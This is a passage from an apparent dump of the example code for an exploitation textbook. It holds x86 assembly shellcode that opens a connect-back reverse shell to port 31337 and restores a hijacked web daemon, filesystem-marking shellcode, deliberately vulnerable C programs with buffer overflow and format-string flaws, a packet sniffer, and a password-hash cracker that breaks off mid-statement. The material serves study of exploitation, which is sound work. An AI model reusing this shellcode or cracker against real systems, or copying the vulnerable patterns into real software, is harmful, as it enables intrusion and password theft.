IP Address = 127.0.0.1 22 | mov WORD [esp+1], dx ; overwrite the BBBB with 0000 in the previous push 23 | push WORD 0x697a ; (in reverse order) PORT = 31337 24 | push WORD bx ; AF_INET = 2 25 | mov ecx, esp ; ecx = server struct pointer 26 | push BYTE 16 ; argv: { sizeof(server struct) = 16, 27 | push ecx ; server struct pointer, 28 | push esi ; socket file descriptor } 29 | mov ecx, esp ; ecx = argument array 30 | inc ebx ; ebx = 3 = SYS_CONNECT = connect() 31 | int 0x80 ; eax = 0 on successful connection 32 | 33 | ; jz success ; if connection successful, jump down to spawn shell 34 | ; xor eax, eax ; otherwise, exit cleanly 35 | ; inc eax ; eax = 1 exit (syscall #1) 36 | ; xor ebx, ebx ; status = 0 (nothing to see here) 37 | ; int 0x80 38 | 39 | ;success: 40 | ; dup2(connected socket, {all three standard I/O file descriptors}) 41 | xchg esi, ebx ; put socket FD from esi into ebx (esi = 3) 42 | xchg ecx, esi ; ecx = 3 43 | dec ecx ; ecx starts at 2 44 | ; xchg eax, esi ; eax = 0x00000003 45 | ; push BYTE 0x2 46 | ; pop ecx ; ecx starts at 2 47 | dup_loop: 48 | mov BYTE al, 0x3F ; dup2 syscall #63 49 | int 0x80 ; dup2(c, 0) 50 | dec ecx ; count down to 0 51 | jns dup_loop ; if the sign flag is not set, ecx is not negative 52 | 53 | ; execve(const char *filename, char *const argv [], char *const envp[]) 54 | mov BYTE al, 11 ; execve syscall #11 55 | push edx ; push some nulls for string termination 56 | push 0x68732f2f ; push "//sh" to the stack 57 | push 0x6e69622f ; push "/bin" to the stack 58 | mov ebx, esp ; put the address of "/bin//sh" into ebx, via esp 59 | push edx ; push 32-bit null terminator to stack 60 | mov edx, esp ; this is an empty array for envp 61 | push ebx ; push string addr to stack above null terminator 62 | mov ecx, esp ; this is the argv array with string ptr 63 | int 0x80 ; execve("/bin//sh", ["/bin//sh", NULL], [NULL]) 64 | -------------------------------------------------------------------------------- /loopback_shell_restore: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/shichao-an/hacking/8387734ae2c95ef7dda0f7c880d2d2c4e6606977/loopback_shell_restore -------------------------------------------------------------------------------- /loopback_shell_restore.s: -------------------------------------------------------------------------------- 1 | BITS 32 2 | 3 | push BYTE 0x02 ; fork is syscall #2 4 | pop eax 5 | int 0x80 ; after the fork, in child process eax == 0 6 | test eax, eax 7 | jz child_process ; in child process spawn a shell 8 | 9 | ; in the parent process, restore tinywebd 10 | lea ebp, [esp+0x68] ; restore EBP 11 | push 0x08048fb7 ; return address 12 | ret ; return 13 | 14 | child_process: 15 | ; s = socket(2, 1, 0) 16 | push BYTE 0x66 ; socketcall is syscall #102 (0x66) 17 | pop eax 18 | cdq ; zero out edx for use as a null DWORD later 19 | xor ebx, ebx ; ebx is the type of socketcall 20 | inc ebx ; 1 = SYS_SOCKET = socket() 21 | push edx ; Build arg array: { protocol = 0, 22 | push BYTE 0x1 ; (in reverse) SOCK_STREAM = 1, 23 | push BYTE 0x2 ; AF_INET = 2 } 24 | mov ecx, esp ; ecx = ptr to argument array 25 | int 0x80 ; after syscall, eax has socket file descriptor 26 | 27 | xchg esi, eax ; save socket FD in esi for later 28 | 29 | ; connect(s, [2, 31337, <IP address>], 16) 30 | push BYTE 0x66 ; socketcall (syscall #102) 31 | pop eax 32 | inc ebx ; ebx = 2 (needed for AF_INET) 33 | push DWORD 0x01BBBB7f ; Build sockaddr struct: IP Address = 127.0.0.1 34 | mov WORD [esp+1], dx ; overwrite the BBBB with 0000 in the previous push 35 | push WORD 0x697a ; (in reverse order) PORT = 31337 36 | push WORD bx ; AF_INET = 2 37 | mov ecx, esp ; ecx = server struct pointer 38 | push BYTE 16 ; argv: { sizeof(server struct) = 16, 39 | push ecx ; server struct pointer, 40 | push esi ; socket file descriptor } 41 | mov ecx, esp ; ecx = argument array 42 | inc ebx ; ebx = 3 = SYS_CONNECT = connect() 43 | int 0x80 ; eax = 0 on successful connection 44 | 45 | ; jz success ; if connection successful, jump down to spawn shell 46 | ; xor eax, eax ; otherwise, exit cleanly 47 | ; inc eax ; eax = 1 exit (syscall #1) 48 | ; xor ebx, ebx ; status = 0 (nothing to see here) 49 | ; int 0x80 50 | 51 | ;success: 52 | ; dup2(connected socket, {all three standard I/O file descriptors}) 53 | xchg esi, ebx ; put socket FD from esi into ebx (esi = 3) 54 | xchg ecx, esi ; ecx = 3 55 | dec ecx ; ecx starts at 2 56 | ; xchg eax, esi ; eax = 0x00000003 57 | ; push BYTE 0x2 58 | ; pop ecx ; ecx starts at 2 59 | dup_loop: 60 | mov BYTE al, 0x3F ; dup2 syscall #63 61 | int 0x80 ; dup2(c, 0) 62 | dec ecx ; count down to 0 63 | jns dup_loop ; if the sign flag is not set, ecx is not negative 64 | 65 | ; execve(const char *filename, char *const argv [], char *const envp[]) 66 | mov BYTE al, 11 ; execve syscall #11 67 | push edx ; push some nulls for string termination 68 | push 0x68732f2f ; push "//sh" to the stack 69 | push 0x6e69622f ; push "/bin" to the stack 70 | mov ebx, esp ; put the address of "/bin//sh" into ebx, via esp 71 | push edx ; push 32-bit null terminator to stack 72 | mov edx, esp ; this is an empty array for envp 73 | push ebx ; push string addr to stack above null terminator 74 | mov ecx, esp ; this is the argv array with string ptr 75 | int 0x80 ; execve("/bin//sh", ["/bin//sh", NULL], [NULL]) 76 | -------------------------------------------------------------------------------- /mark: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/shichao-an/hacking/8387734ae2c95ef7dda0f7c880d2d2c4e6606977/mark -------------------------------------------------------------------------------- /mark.s: -------------------------------------------------------------------------------- 1 | BITS 32 2 | ; Mark the filesystem to prove you ran 3 | jmp short one 4 | two: 5 | pop ebx ; filename 6 | xor ecx, ecx 7 | mov BYTE [ebx+7], cl ; null terminate filename 8 | push BYTE 0x5 ; open() 9 | pop eax 10 | mov WORD cx, 0x441 ; O_WRONLY|O_APPEND|O_CREAT 11 | xor edx, edx 12 | mov WORD dx, 0x180 ; S_IRUSR|S_IWUSR 13 | int 0x80 ; open file to create it 14 | ; eax = returned file descriptor 15 | mov ebx, eax ; file descriptor to second arg 16 | push BYTE 0x6 ; close () 17 | pop eax 18 | int 0x80 ; close file 19 | 20 | int3 ; interrupt 21 | one: 22 | call two 23 | db "/HackedX" 24 | ; 01234567 25 | -------------------------------------------------------------------------------- /mark_break: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/shichao-an/hacking/8387734ae2c95ef7dda0f7c880d2d2c4e6606977/mark_break -------------------------------------------------------------------------------- /mark_break.s: -------------------------------------------------------------------------------- 1 | BITS 32 2 | ; Mark the filesystem to prove you ran 3 | jmp short one 4 | two: 5 | pop ebx ; filename 6 | xor ecx, ecx 7 | mov BYTE [ebx+7], cl ; null terminate filename 8 | push BYTE 0x5 ; open() 9 | pop eax 10 | mov WORD cx, 0x441 ; O_WRONLY|O_APPEND|O_CREAT 11 | xor edx, edx 12 | mov WORD dx, 0x180 ; S_IRUSR|S_IWUSR 13 | int 0x80 ; open file to create it 14 | ; eax = returned file descriptor 15 | mov ebx, eax ; file descriptor to second arg 16 | push BYTE 0x6 ; close () 17 | pop eax 18 | int 0x80 ; close file 19 | 20 | int3 ; interrupt 21 | one: 22 | call two 23 | db "/HackedX" 24 | ; 01234567 25 | -------------------------------------------------------------------------------- /mark_restore: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/shichao-an/hacking/8387734ae2c95ef7dda0f7c880d2d2c4e6606977/mark_restore -------------------------------------------------------------------------------- /mark_restore.s: -------------------------------------------------------------------------------- 1 | BITS 32 2 | ; Mark the filesystem to prove you ran 3 | jmp short one 4 | two: 5 | pop ebx ; filename 6 | xor ecx, ecx 7 | mov BYTE [ebx+7], cl ; null terminate filename 8 | push BYTE 0x5 ; open() 9 | pop eax 10 | mov WORD cx, 0x441 ; O_WRONLY|O_APPEND|O_CREAT 11 | xor edx, edx 12 | mov WORD dx, 0x180 ; S_IRUSR|S_IWUSR 13 | int 0x80 ; open file to create it 14 | ; eax = returned file descriptor 15 | mov ebx, eax ; file descriptor to second arg 16 | push BYTE 0x6 ; close () 17 | pop eax 18 | int 0x80 ; close file 19 | 20 | lea ebp, [esp+0x68] ; restore EBP 21 | push 0x08048fb7 ; return address 22 | ret ; return 23 | one: 24 | call two 25 | db "/HackedX" 26 | ; 01234567 27 | -------------------------------------------------------------------------------- /memory_segments.c: -------------------------------------------------------------------------------- 1 | #include <stdio.h> 2 | 3 | int global_var; 4 | int global_initialized_var = 5; 5 | 6 | void function() { // This is just a demo function 7 | int stack_var; // notice this variable has the same name as the one in main() 8 | 9 | printf("the function's stack_var is at address 0x%08x\n", &stack_var); 10 | } 11 | 12 | 13 | int main() { 14 | int stack_var; // same name as the variable in function() 15 | static int static_initialized_var = 5; 16 | static int static_var; 17 | int *heap_var_ptr; 18 | 19 | heap_var_ptr = (int *) malloc(4); 20 | 21 | // These variables are in the data segment 22 | printf("global_initialized_var is at address 0x%08x\n", &global_initialized_var); 23 | printf("static_initialized_var is at address 0x%08x\n\n", &static_initialized_var); 24 | 25 | // These variables are in the bss segment 26 | printf("static_var is at address 0x%08x\n", &static_var); 27 | printf("global_var is at address 0x%08x\n\n", &global_var); 28 | 29 | // This variable is in the heap segment 30 | printf("heap_var is at address 0x%08x\n\n", heap_var_ptr); 31 | 32 | // These variables are in the stack segment 33 | printf("stack_var is at address 0x%08x\n", &stack_var); 34 | function(); 35 | } 36 | -------------------------------------------------------------------------------- /notesearch.c: -------------------------------------------------------------------------------- 1 | #include <stdio.h> 2 | #include <string.h> 3 | #include <fcntl.h> 4 | #include <sys/stat.h> 5 | #include "hacking.h" 6 | 7 | #define FILENAME "/var/notes" 8 | 9 | int print_notes(int, int, char *); // note printing function 10 | int find_user_note(int, int); // seek in file for a note for user 11 | int search_note(char *, char *); // search for keyword function 12 | void fatal(char *); // fatal error handler 13 | 14 | int main(int argc, char *argv[]) { 15 | int userid, printing=1, fd; // file descriptor 16 | char searchstring[100]; 17 | 18 | if(argc > 1) // If there is an arg 19 | strcpy(searchstring, argv[1]); // that is the search string 20 | else // otherwise 21 | searchstring[0] = 0; // search string is empty 22 | 23 | userid = getuid(); 24 | fd = open(FILENAME, O_RDONLY); // open the file for read-only access 25 | if(fd == -1) 26 | fatal("in main() while opening file for reading"); 27 | 28 | while(printing) 29 | printing = print_notes(fd, userid, searchstring); 30 | printf("-------[ end of note data ]-------\n"); 31 | close(fd); 32 | } 33 | 34 | // A function to print the notes for a given uid that match 35 | // an optional search string 36 | // returns 0 at end of file, 1 if there are still more notes 37 | int print_notes(int fd, int uid, char *searchstring) { 38 | int note_length; 39 | char byte=0, note_buffer[100]; 40 | 41 | note_length = find_user_note(fd, uid); 42 | if(note_length == -1) // if end of file reached 43 | return 0; // return 0 44 | 45 | read(fd, note_buffer, note_length); // read note data 46 | note_buffer[note_length] = 0; // terminate the string 47 | 48 | if(search_note(note_buffer, searchstring)) // if searchstring found 49 | printf(note_buffer); // print the note 50 | return 1; 51 | } 52 | 53 | // A function to find the next note for a given userID 54 | // returns -1 if the end of the file is reached 55 | // otherwise it returns the length of the found note 56 | int find_user_note(int fd, int user_uid) { 57 | int note_uid=-1; 58 | unsigned char byte; 59 | int length; 60 | 61 | while(note_uid != user_uid) { // loop until a note for user_uid is found 62 | if(read(fd, &note_uid, 4) != 4) // read the uid data 63 | return -1; // if 4 bytes aren't read, return end of file code 64 | if(read(fd, &byte, 1) != 1) // read the newline separator 65 | return -1; 66 | 67 | byte = length = 0; 68 | while(byte != '\n') { // figure out how many bytes to the end of line 69 | if(read(fd, &byte, 1) != 1) // read a single byte 70 | return -1; // if byte isn't read, return end of file code 71 | length++; 72 | } 73 | } 74 | lseek(fd, length * -1, SEEK_CUR); // rewind file reading by length bytes 75 | 76 | printf("[DEBUG] found a %d byte note for user id %d\n", length, note_uid); 77 | return length; 78 | } 79 | 80 | // A function to search a note for a given keyword 81 | // returns 1 if a match is found, 0 if there is no match 82 | int search_note(char *note, char *keyword) { 83 | int i, keyword_length, match=0; 84 | 85 | keyword_length = strlen(keyword); 86 | if(keyword_length == 0) // if there is no search string 87 | return 1; // always "match" 88 | 89 | for(i=0; i < strlen(note); i++) { // iterate over bytes in note 90 | if(note[i] == keyword[match]) // if byte matches keyword 91 | match++; // get ready to check the next byte 92 | else { // otherwise 93 | if(note[i] == keyword[0]) // if that byte matches first keyword byte 94 | match = 1; // start the match count at 1 95 | else 96 | match = 0; // otherwise it is zero 97 | } 98 | if(match == keyword_length) // if there is a full match 99 | return 1; // return matched 100 | } 101 | return 0; // return not matched 102 | } 103 | 104 | -------------------------------------------------------------------------------- /notetaker.c: -------------------------------------------------------------------------------- 1 | #include <stdio.h> 2 | #include <stdlib.h> 3 | #include <string.h> 4 | #include <fcntl.h> 5 | #include <sys/stat.h> 6 | #include "hacking.h" 7 | 8 | void usage(char *prog_name, char *filename) { 9 | printf("Usage: %s <data to add to %s>\n", prog_name, filename); 10 | exit(0); 11 | } 12 | 13 | void fatal(char *); // a function for fatal errors 14 | void *ec_malloc(unsigned int); // an errorchecked malloc() wrapper 15 | 16 | int main(int argc, char *argv[]) { 17 | int userid, fd; // file descriptor 18 | char *buffer, *datafile; 19 | 20 | buffer = (char *) ec_malloc(100); 21 | datafile = (char *) ec_malloc(20); 22 | strcpy(datafile, "/var/notes"); 23 | 24 | if(argc < 2) // If there aren't commandline arguments 25 | usage(argv[0], datafile); // display usage message and exit 26 | 27 | strcpy(buffer, argv[1]); // copy into buffer 28 | 29 | printf("[DEBUG] buffer @ %p: \'%s\'\n", buffer, buffer); 30 | printf("[DEBUG] datafile @ %p: \'%s\'\n", datafile, datafile); 31 | 32 | // Opening the file 33 | fd = open(datafile, O_WRONLY|O_CREAT|O_APPEND, S_IRUSR|S_IWUSR); 34 | if(fd == -1) 35 | fatal("in main() while opening file"); 36 | printf("[DEBUG] file descriptor is %d\n", fd); 37 | 38 | userid = getuid(); // get the real user ID 39 | 40 | // Writing data 41 | if(write(fd, &userid, 4) == -1) // write user ID before note data 42 | fatal("in main() while writing userid to file"); 43 | write(fd, "\n", 1); // terminate line 44 | 45 | if(write(fd, buffer, strlen(buffer)) == -1) // write note 46 | fatal("in main() while writing buffer to file"); 47 | write(fd, "\n", 1); // terminate line 48 | 49 | // Closing file 50 | if(close(fd) == -1) 51 | fatal("in main() while closing file"); 52 | 53 | printf("Note has been saved.\n"); 54 | free(buffer); 55 | free(datafile); 56 | } 57 | -------------------------------------------------------------------------------- /overflow_example.c: -------------------------------------------------------------------------------- 1 | #include <stdio.h> 2 | #include <string.h> 3 | 4 | int main(int argc, char *argv[]) { 5 | int value = 5; 6 | char buffer_one[8], buffer_two[8]; 7 | 8 | strcpy(buffer_one, "one"); /* put "one" into buffer_one */ 9 | strcpy(buffer_two, "two"); /* put "two" into buffer_two */ 10 | 11 | printf("[BEFORE] buffer_two is at %p and contains \'%s\'\n", buffer_two, buffer_two); 12 | printf("[BEFORE] buffer_one is at %p and contains \'%s\'\n", buffer_one, buffer_one); 13 | printf("[BEFORE] value is at %p and is %d (0x%08x)\n", &value, value, value); 14 | 15 | printf("\n[STRCPY] copying %d bytes into buffer_two\n\n", strlen(argv[1])); 16 | strcpy(buffer_two, argv[1]); /* copy first argument into buffer_two */ 17 | 18 | printf("[AFTER] buffer_two is at %p and contains \'%s\'\n", buffer_two, buffer_two); 19 | printf("[AFTER] buffer_one is at %p and contains \'%s\'\n", buffer_one, buffer_one); 20 | printf("[AFTER] value is at %p and is %d (0x%08x)\n", &value, value, value); 21 | } 22 | -------------------------------------------------------------------------------- /pcap_sniff.c: -------------------------------------------------------------------------------- 1 | #include <pcap.h> 2 | #include "hacking.h" 3 | 4 | void pcap_fatal(const char *failed_in, const char *errbuf) { 5 | printf("Fatal Error in %s: %s\n", failed_in, errbuf); 6 | exit(1); 7 | } 8 | 9 | int main() { 10 | struct pcap_pkthdr header; 11 | const u_char *packet; 12 | char errbuf[PCAP_ERRBUF_SIZE]; 13 | char *device; 14 | pcap_t *pcap_handle; 15 | int i; 16 | 17 | device = pcap_lookupdev(errbuf); 18 | if(device == NULL) 19 | pcap_fatal("pcap_lookupdev", errbuf); 20 | 21 | printf("Sniffing on device %s\n", device); 22 | 23 | pcap_handle = pcap_open_live(device, 4096, 1, 0, errbuf); 24 | if(pcap_handle == NULL) 25 | pcap_fatal("pcap_open_live", errbuf); 26 | 27 | for(i=0; i < 3; i++) { 28 | packet = pcap_next(pcap_handle, &header); 29 | printf("Got a %d byte packet\n", header.len); 30 | dump(packet, header.len); 31 | } 32 | 33 | pcap_close(pcap_handle); 34 | } 35 | -------------------------------------------------------------------------------- /pointer.c: -------------------------------------------------------------------------------- 1 | #include <stdio.h> 2 | #include <string.h> 3 | 4 | int main() { 5 | char str_a[20]; // a 20 element character array 6 | char *pointer; // a pointer, meant for a character array 7 | char *pointer2; // and yet another one 8 | 9 | strcpy(str_a, "Hello World\n"); 10 | pointer = str_a; // set the first pointer to the start of the array 11 | printf(pointer); 12 | 13 | pointer2 = pointer + 2; // set the second one 2 bytes further in 14 | printf(pointer2); // print it 15 | strcpy(pointer2, "y you guys!\n"); // copy into that spot 16 | printf(pointer); // print again 17 | } 18 | -------------------------------------------------------------------------------- /pointer_types.c: -------------------------------------------------------------------------------- 1 | #include <stdio.h> 2 | 3 | int main() { 4 | int i; 5 | 6 | char char_array[5] = {'a', 'b', 'c', 'd', 'e'}; 7 | int int_array[5] = {1, 2, 3, 4, 5}; 8 | 9 | char *char_pointer; 10 | int *int_pointer; 11 | 12 | char_pointer = char_array; 13 | int_pointer = int_array; 14 | 15 | for(i=0; i < 5; i++) { // iterate through the int array with the int_pointer 16 | printf("[integer pointer] points to %p, which contains the integer %d\n", 17 | int_pointer, *int_pointer); 18 | int_pointer = int_pointer + 1; 19 | } 20 | 21 | for(i=0; i < 5; i++) { // iterate through the char array with the char_pointer 22 | printf("[char pointer] points to %p, which contains the char '%c'\n", 23 | char_pointer, *char_pointer); 24 | char_pointer = char_pointer + 1; 25 | } 26 | } 27 | -------------------------------------------------------------------------------- /pointer_types2.c: -------------------------------------------------------------------------------- 1 | #include <stdio.h> 2 | 3 | int main() { 4 | int i; 5 | 6 | char char_array[5] = {'a', 'b', 'c', 'd', 'e'}; 7 | int int_array[5] = {1, 2, 3, 4, 5}; 8 | 9 | char *char_pointer; 10 | int *int_pointer; 11 | 12 | char_pointer = int_array; // The char_pointer and int_pointer now 13 | int_pointer = char_array; // point to incompatable data types 14 | 15 | for(i=0; i < 5; i++) { // iterate through the int array with the int_pointer 16 | printf("[integer pointer] points to %p, which contains the char '%c'\n", 17 | int_pointer, *int_pointer); 18 | int_pointer = int_pointer + 1; 19 | } 20 | 21 | for(i=0; i < 5; i++) { // iterate through the char array with the char_pointer 22 | printf("[char pointer] points to %p, which contains the integer %d\n", 23 | char_pointer, *char_pointer); 24 | char_pointer = char_pointer + 1; 25 | } 26 | } 27 | -------------------------------------------------------------------------------- /pointer_types3.c: -------------------------------------------------------------------------------- 1 | #include <stdio.h> 2 | 3 | int main() { 4 | int i; 5 | 6 | char char_array[5] = {'a', 'b', 'c', 'd', 'e'}; 7 | int int_array[5] = {1, 2, 3, 4, 5}; 8 | 9 | char *char_pointer; 10 | int *int_pointer; 11 | 12 | char_pointer = (char *) int_array; // Typecast into the 13 | int_pointer = (int *) char_array; // pointer's data type 14 | 15 | for(i=0; i < 5; i++) { // iterate through the int array with the int_pointer 16 | printf("[integer pointer] points to %p, which contains the char '%c'\n", 17 | int_pointer, *int_pointer); 18 | int_pointer = (int *) ((char *) int_pointer + 1); 19 | } 20 | 21 | for(i=0; i < 5; i++) { // iterate through the char array with the char_pointer 22 | printf("[char pointer] points to %p, which contains the integer %d\n", 23 | char_pointer, *char_pointer); 24 | char_pointer = (char *) ((int *) char_pointer + 1); 25 | } 26 | } 27 | -------------------------------------------------------------------------------- /pointer_types4.c: -------------------------------------------------------------------------------- 1 | #include <stdio.h> 2 | 3 | int main() { 4 | int i; 5 | 6 | char char_array[5] = {'a', 'b', 'c', 'd', 'e'}; 7 | int int_array[5] = {1, 2, 3, 4, 5}; 8 | 9 | void *void_pointer; 10 | 11 | void_pointer = (void *) char_array; 12 | 13 | for(i=0; i < 5; i++) { // iterate through the int array with the int_pointer 14 | printf("[char pointer] points to %p, which contains the char '%c'\n", 15 | void_pointer, *((char *) void_pointer)); 16 | void_pointer = (void *) ((char *) void_pointer + 1); 17 | } 18 | 19 | void_pointer = (void *) int_array; 20 | 21 | for(i=0; i < 5; i++) { // iterate through the int array with the int_pointer 22 | printf("[integer pointer] points to %p, which contains the integer %d\n", 23 | void_pointer, *((int *) void_pointer)); 24 | void_pointer = (void *) ((int *) void_pointer + 1); 25 | } 26 | } 27 | -------------------------------------------------------------------------------- /pointer_types5.c: -------------------------------------------------------------------------------- 1 | #include <stdio.h> 2 | 3 | int main() { 4 | int i; 5 | 6 | char char_array[5] = {'a', 'b', 'c', 'd', 'e'}; 7 | int int_array[5] = {1, 2, 3, 4, 5}; 8 | 9 | unsigned int hacky_nonpointer; 10 | 11 | hacky_nonpointer = (unsigned int) char_array; 12 | 13 | for(i=0; i < 5; i++) { // iterate through the int array with the int_pointer 14 | printf("[hacky_nonpointer] points to %p, which contains the char '%c'\n", 15 | hacky_nonpointer, *((char *) hacky_nonpointer)); 16 | hacky_nonpointer = hacky_nonpointer + sizeof(char); 17 | } 18 | 19 | hacky_nonpointer = (unsigned int) int_array; 20 | 21 | for(i=0; i < 5; i++) { // iterate through the int array with the int_pointer 22 | printf("[hacky_nonpointer] points to %p, which contains the integer %d\n", 23 | hacky_nonpointer, *((int *) hacky_nonpointer)); 24 | hacky_nonpointer = hacky_nonpointer + sizeof(int); 25 | } 26 | } 27 | -------------------------------------------------------------------------------- /portbinding_shellcode: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/shichao-an/hacking/8387734ae2c95ef7dda0f7c880d2d2c4e6606977/portbinding_shellcode -------------------------------------------------------------------------------- /ppm_crack.c: -------------------------------------------------------------------------------- 1 | /*********************************************************\ 2 | * Password Probability Matrix * File: ppm_crack.c * 3 | *********************************************************** 4 | * * 5 | * Author: Jon Erickson <matrix@phiral.com> * 6 | * Organization: Phiral Research Laboratories * 7 | * * 8 | * This is the crack program for the PPM proof of concept.* 9 | * It uses an existing file called 4char.ppm, which * 10 | * contains information regarding all possible 4 * 11 | * character passwords salted with 'je'. This file can * 12 | * be generated with the corresponding ppm_gen.c program. * 13 | * * 14 | \*********************************************************/ 15 | 16 | #define _XOPEN_SOURCE 17 | #include <unistd.h> 18 | #include <stdio.h> 19 | #include <stdlib.h> 20 | 21 | #define HEIGHT 16384 22 | #define WIDTH 1129 23 | #define DEPTH 8 24 | #define SIZE HEIGHT * WIDTH * DEPTH 25 | #define DCM HEIGHT * WIDTH 26 | 27 | /* map a single hash byte to an enumerated value */ 28 | int enum_hashbyte(char a) { 29 | int i, j; 30 | i = (int)a; 31 | if((i >= 46) && (i <= 57)) 32 | j = i - 46; 33 | else if ((i >= 65) && (i <= 90)) 34 | j = i - 53; 35 | else if ((i >= 97) && (i <= 122)) 36 | j = i - 59; 37 | return j; 38 | } 39 | 40 | /* map 3 hash bytes to an enumerated value */ 41 | int enum_hashtriplet(char a, char b, char c) { 42 | return (((enum_hashbyte(c)%4)*4096)+(enum_hashbyte(a)*64)+enum_hashbyte(b)); 43 | } 44 | 45 | /* merge two vectors */ 46 | void merge(char *vector1, char *vector2) { 47 | int i; 48 | for(i=0; i < WIDTH; i++) 49 | vector1[i] &= vector2[i]; 50 | } 51 | 52 | /* returns the bit in the vector at the passed index position */ 53 | int get_vector_bit(char *vector, int index) { 54 | return ((vector[(index/8)]&(1<<(index%8)))>>(index%8)); 55 | } 56 | 57 | /* counts the number of plaintext pairs in the passed vector */ 58 | int count_vector_bits(char *vector) { 59 | int i, count=0; 60 | for(i=0; i < 9025; i++) 61 | count += get_vector_bit(vector, i); 62 | return count; 63 | } 64 | 65 | /* print the plaintext pairs that each ON bit in the vector enumerates */ 66 | void print_vector(char *vector) { 67 | int i, a, b, val; 68 | for(i=0; i < 9025; i++) { 69 | if(get_vector_bit(vector, i) == 1) { // if bit is on 70 | a = i / 95; // calculate the 71 | b = i - (a * 95); // plaintext pair 72 | printf("%c%c ",a+32, b+32); // and print it 73 | } 74 | } 75 | printf("\n"); 76 | } 77 | 78 | /* barf a message and exit */ 79 | void barf(char *message, char *extra) { 80 | printf(message, extra); 81 | exit(1); 82 | } 83 | 84 | /* crack a 4 character password using generated 4char.ppm file */ 85 | int main(int argc, char *argv[]) { 86 | char *pass, plain[5]; 87 | unsigned char bin_vector1[WIDTH], bin_vector2[WIDTH], temp_vector[WIDTH]; 88 | char prob_vector1[2][9025]; 89 | char prob_vector2[2][9025]; 90 | int a, b, i, j, len, pv1_len=0, pv2_len=0; 91 | FILE *fd; 92 | 93 | if(argc < 1) 94 | barf("Usage: %s <password hash> (will use the file 4char.ppm)\n", argv[0]); 95 | 96 | if(!(fd = fopen("4char.ppm", "r"))) 97 | barf("Fatal: Couldn't open PPM file for reading.\n", NULL); 98 | 99 | pass = argv[1]; // first argument is password hash 100 | 101 | printf("Filtering possible plaintext bytes for the first two characters:\n"); 102 | 103 | fseek(fd,(DCM*0)+enum_hashtriplet(pass[2], pass[3], pass[4])*WIDTH, SEEK_SET); 104 | fread(bin_vector1, WIDTH, 1, fd); // read the vector associating bytes 2-4 of hash 105 | 106 | len = count_vector_bits(bin_vector1); 107 | printf("only 1 vector of 4:\t%d plaintext pairs, with %0.2f%% saturation\n", len, len*100.0/9025.0); 108 | 109 | fseek(fd,(DCM*1)+enum_hashtriplet(pass[4], pass[5], pass[6])*WIDTH, SEEK_SET); 110 | fread(temp_vector, WIDTH, 1, fd); // read the vector associating bytes 4-6 of hash 111 | merge(bin_vector1, temp_vector); // merge it with the first vector 112 | 113 | len = count_vector_bits(bin_vector1); 114 | printf("vectors 1 AND 2 merged:\t%d plaintext pairs, with %0.2f%% saturation\n", len, len*100.0/9025.0); 115 | 116 | fseek(fd,(DCM*2)+enum_hashtriplet(pass[6], pass[7], pass[8])*WIDTH, SEEK_SET); 117 | fread(temp_vector, WIDTH, 1, fd); // read the vector associating bytes 6-8 of hash 118 | merge(bin_vector1, temp_vector); // merge it with the first two vectors 119 | 120 | len = count_vector_bits(bin_vector1); 121 | printf("first 3 vectors merged:\t%d plaintext pairs, with %0.2f%% saturation\n", len, len*100.0/9025.0); 122 | 123 | fseek(fd,(DCM*3)+enum_hashtriplet(pass[8], pass[9],pass[10])*WIDTH, SEEK_SET); 124 | fread(temp_vector, WIDTH, 1, fd); // read the vector associatind bytes 8-10 of hash 125 | merge(bin_vector1, temp_vector); // merge it with the othes vectors 126 | 127 | len = count_vector_bits(bin_vector1); 128 | printf("all 4 vectors merged:\t%d plaintext pairs, with %0.2f%% saturation\n", len, len*100.0/9025.0); 129 | 130 | printf("Possible plaintext pairs for the first two bytes:\n"); 131 | print_vector(bin_vector1); 132 | 133 | printf("\nFiltering possible plaintext bytes for the last two characters:\n"); 134 | 135 | fseek(fd,(DCM*4)+enum_hashtriplet(pass[2], pass[3], pass[4])*WIDTH, SEEK_SET); 136 | fread(bin_vector2, WIDTH, 1, fd); // read the vector associating bytes 2-4 of hash 137 | 138 | len = count_vector_bits(bin_vector2); 139 | printf("only 1 vector of 4:\t%d plaintext pairs, with %0.2f%% saturation\n", len, len*100.0/9025.0); 140 | 141 | fseek(fd,(DCM*5)+enum_hashtriplet(pass[4], pass[5], pass[6])*WIDTH, SEEK_SET); 142 | fread(temp_vector, WIDTH, 1, fd); // read the vector associating bytes 4-6 of hash 143 | merge(bin_vector2, temp_vector); // merge it with the first vector 144 | 145 | len = count_vector_bits(bin_vector2); 146 | printf("vectors 1 AND 2 merged:\t%d plaintext pairs, with %0.2f%% saturation\n", len, len*100.0/9025.0); 147 | 148 | fseek(fd,(DCM*6)+enum_hashtriplet(pass[6], pass[7], pass[8])*WIDTH, SEEK_SET); 149 | fread(temp_vector, WIDTH, 1, fd); // read the vector associating bytes 6-8 of hash 150 | merge(bin_vector2, temp_vector); // merge it with the first two vectors 151 | 152 | len = count_vector_bits(bin_vector2); 153 | printf("first 3 vectors merged:\t%d plaintext pairs, with %0.2f%% saturation\n", len, len*100.0/9025.0); 154 | 155 | fseek(fd,(DCM*7)+enum_hashtriplet(pass[8], pass[9],pass[10])*WIDTH, SEEK_SET); 156 | fread(temp_vector, WIDTH, 1, fd); // read the vector associatind bytes 8-10 of hash 157 | merge(bin_vector2, temp_vector); // merge it with the othes vectors 158 | 159 | len = count_vector_bits(bin_vector2); 160 | printf("all 4 vectors merged:\t%d plaintext pairs, with %0.2f%% saturation\n", len, len*100.0/9025.0); 161 | 162 | printf("Possible plaintext pairs for the last two bytes:\n"); 163 | print_vector(bin_vector2); 164 | 165 | printf("Building probability vectors...\n"); 166 | for(i=0; i < 9025; i++) { // find possible first two plaintext bytes 167 | if(get_vector_bit(bin_vector1, i)==1) {; 168 | prob_vector1[0][pv1_len] = i / 95; 169 | prob_vector1[1][pv1_len] = i - (prob_vector1[0][pv1_len] * 95); 170 | pv1_len++; 171 | } 172 | } 173 | for(i=0; i < 9025; i++) { // find possible last two plaintext bytes 174 | if(get_vector_bit(bin_vector2, i)) { 175 | prob_vector2[0][pv2_len] = i / 95; 176 | prob_vector2[1][pv2_len] = i - (prob_vector2[0][pv2_len] * 95); 177 | pv2_len++; 178 | } 179 | } 180 | 181 | printf("Cracking remaining %d possibilites..\n", pv1_len*pv2_len); 182 | for(i=0; i < pv1_len; i++) { 183 | for(j=0; j < pv2_len; j++) { 184 | plain[0] = prob_vector1[0][i] + 32; 185 | plain[1] = prob_vector1[1][i] 